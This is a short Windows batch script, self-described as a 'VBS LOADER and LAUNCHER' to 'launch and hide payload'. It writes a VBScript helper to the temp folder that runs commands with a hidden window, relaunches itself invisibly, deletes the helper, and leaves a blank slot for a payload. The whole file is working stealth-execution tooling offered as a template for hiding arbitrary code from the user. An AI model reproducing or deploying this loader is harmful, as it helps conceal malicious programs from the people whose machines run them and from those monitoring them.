REM Author: Roberto Mazzoni
REM Scope: launch and hide payload
REM VBS LOADER and LAUNCHER
REM functions:
REM ########################################
REM ## -1 Auto_generate vbs code          ##
REM ## -2 Launch wshell.vbs thisfile.cmd  ##
REM ########################################
REM Config:
set scriptName=thisfile.cmd

REM ######################################################################
set vbsname=%TMP%\wshell.vbs
if not exist %vbsname% (
echo Set objArgs = WScript.Arguments > %vbsname% 
echo For Each strArg in objArgs >> %vbsname%
echo     Set WshShell = CreateObject^("WScript.Shell"^) >> %vbsname%
echo     cmds=WshShell.RUN^(strArg, 0, False^) >> %vbsname%
echo     Set WshShell = Nothing >> %vbsname%
echo Next >> %vbsname%
REM WRITE LOG
echo PROGRAM TEST LOKI_1 START AT: %datanows%>>%TMP%\hideMS.log
REM FINALLY::
start %vbsname% %TMP%\%scriptName%
exit
)
REM #####################################################################

REM IF EXIST::
del %vbsname%

REM ADD YOUR CODE:
REM Start Payload
REM ...
REM ...
REM End Payload
